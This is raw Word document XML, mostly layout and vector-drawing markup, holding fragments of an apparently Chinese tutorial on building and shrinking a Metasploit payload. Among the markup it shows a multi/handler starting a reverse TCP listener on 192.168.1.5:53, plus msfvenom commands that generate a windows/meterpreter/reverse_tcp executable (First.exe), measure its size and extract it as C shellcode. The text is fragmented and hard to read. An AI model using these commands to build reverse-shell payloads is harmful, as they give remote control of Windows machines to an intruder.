2305,2494,2305,2497,2305,2500,2305,2503,2305,2506,2305,2509,2305,2512,2305,2515,2305,2518,2305,2522,2305,2525,2305,2528,2305,2532,2305,2536,2305,2539,2305,2543,2305,2547,2305,2551,2305,2555,2305,2559,2305,2563,2305,2568,2305,2572,2305,2577,2305,2581,2305,2586,2305,2591,2305,2596,2305,2600,2305,2606,2305,2611,2305,2616,2305,2621,2305,2627,2305,2632,2305,2638,2305,2644,2305,2650,2305,2655,2305,2662,2305,2668,2305,2674,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2304,2680,2304,2680,2304,2680,2304,2680,2304,2680,2304,2680,2304,2680,2303,2680,2303,2680,2303,2680,2303,2680,2303,2680,2302,2680,2302,2680,2302,2680,2302,2680,2301,2680,2301,2680,2301,2680,2300,2680,2300,2680,2299,2680,2299,2680,2299,2680,2298,2680,2298,2680,2297,2680,2297,2680,2296,2680,2296,2680,2295,2680,2295,2680,2294,2680,2293,2680,2293,2680,2292,2680,2291,2680,2291,2680,2290,2680,2289,2680,2288,2680,2287,2680,2286,2680,2286,2680,2285,2680,2284,2680,2283,2680,2282,2680,2281,2680,2280,2680,2279,2680,2277,2680,2276,2680,2275,2680,2274,2680,2273,2680,2271,2680,2270,2680,2269,2680,2267,2680,2266,2680,2264,2680,2263,2680,2261,2680,2260,2680,2258,2680,2257,2680,2255,2680,2253,2680,2251,2680,2250,2680,2248,2680,2246,2680,2244,2680,2242,2680,2240,2680,2238,2680,2236,2680,2234,2680,2232,2680,2230,2680,2227,2680,2225,2680,2223,2680,2220,2680,2218,2680,2215,2680,2213,2680,2210,2680,2208,2680,2205,2680,2202,2680,2200,2680,2197,2680,2194,2680,2191,2680,2188,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2679,2185,2679,2185,2679,2185,2679,2185,2679,2185,2679,2185,2678,2185,2678,2185,2678,2185,2677,2185,2677,2185,2677,2185,2676,2185,2676,2185,2675,2185,2675,2185,2674,2185,2674,2185,2673,2185,2673,2185,2672,2185,2671,2185,2671,2185,2670,2185,2669,2185,2668,2185,2667,2185,2667,2185,2666,2185,2665,2185,2664,2185,2663,2185,2661,2185,2660,2185,2659,2185,2658,2185,2657,2185,2655,2185,2654,2185,2652,2185,2651,2185,2649,2185,2648,2185,2646,2185,2644,2185,2642,2185,2641,2185,2639,2185,2637,2185,2635,2185,2633,2185,2631,2185,2628,2185,2626,2185,2624,2185,2621,2185,2619,2185,2616,2185,2614,2185,2611,2185,2609,2185,2606,2185,2603,2185,2600,2185,2597,2185,2594,2185,2591,2185,2587,2185,2584,2185,2581,2185,2577,2185,2574,2185,2570,2185,2566,2185,2562,2185,2559,2185,2555,2185,2551,2185,2546,2185,2542,2185,2538,2185,2533,2185,2529,2185,2524,2185,2520,2185,2515,2185,2510,2185,2505,2185,2500,2185,2495,2185,2490,2185,2484,2185,2479,2185,2473,2185,2468,2185,2462,2185,2456,2185,2450,2185,2444,2185,2438,2185,2432,2185,2425e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:174.600pt;width:467.400pt;height:257.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12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6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23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="111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24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5421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25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msf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exploit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multi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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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)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exploit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26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="386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27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Started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reverse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TCP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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on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192.168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.1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.5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53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28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37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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload生成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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: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tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfvenom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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp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6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST=192.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6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT=53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'\x00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f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28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f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  <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>First.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="357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原始pay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load大小如下：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7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3802字节，大概在72KB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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1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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>du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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐sb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6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>First.exe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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>73802</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>First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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="330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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第一次优化p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload：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提取windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> 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shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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: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tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfvenom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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp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6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST=192.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6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT=53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'\x00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c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group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:689.322pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,13786">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:13786" coordorigin="10402,0" coordsize="0,13786" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,4,10402,5,10402,8,10402,10,10402,14,10402,17,10402,22,10402,27,10402,33,10402,40,10402,47,10402,56,10402,65,10402,75,10402,87,10402,99,10402,113,10402,127,10402,143,10402,161,10402,179,10402,199,10402,220,10402,243,10402,268,10402,294,10402,321,10402,350,10402,381,10402,414,10402,448,10402,485,10402,523,10402,563,10402,606,10402,650,10402,696,10402,745,10402,796,10402,849,10402,904,10402,962,10402,1022,10402,1085,10402,1150,10402,1217,10402,1288,10402,1361,10402,1436,10402,1515,10402,1596,10402,1680,10402,1767,10402,1856,10402,1949,10402,2045,10402,2144,10402,2246,10402,2352,10402,2460,10402,2572,10402,2687,10402,2806,10402,2928,10402,3053,10402,3182,10402,3315,10402,3451,10402,3591,10402,3734,10402,3882,10402,4033,10402,4188,10402,4347,10402,4510,10402,4677,10402,4848,10402,5024,10402,5203,10402,5387,10402,5575,10402,5767,10402,5964,10402,6165,10402,6370,10402,6580,10402,6795,10402,7014,10402,7238,10402,7466,10402,7699,10402,7938,10402,8181,10402,8428,10402,8681,10402,8939,10402,9202,10402,9470,10402,9743,10402,10022,10402,10305,10402,10594,10402,10889,10402,11188,10402,11493,10402,11804,10402,12120,10402,12442,10402,12769,10402,13102,10402,13441,10402,13786e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
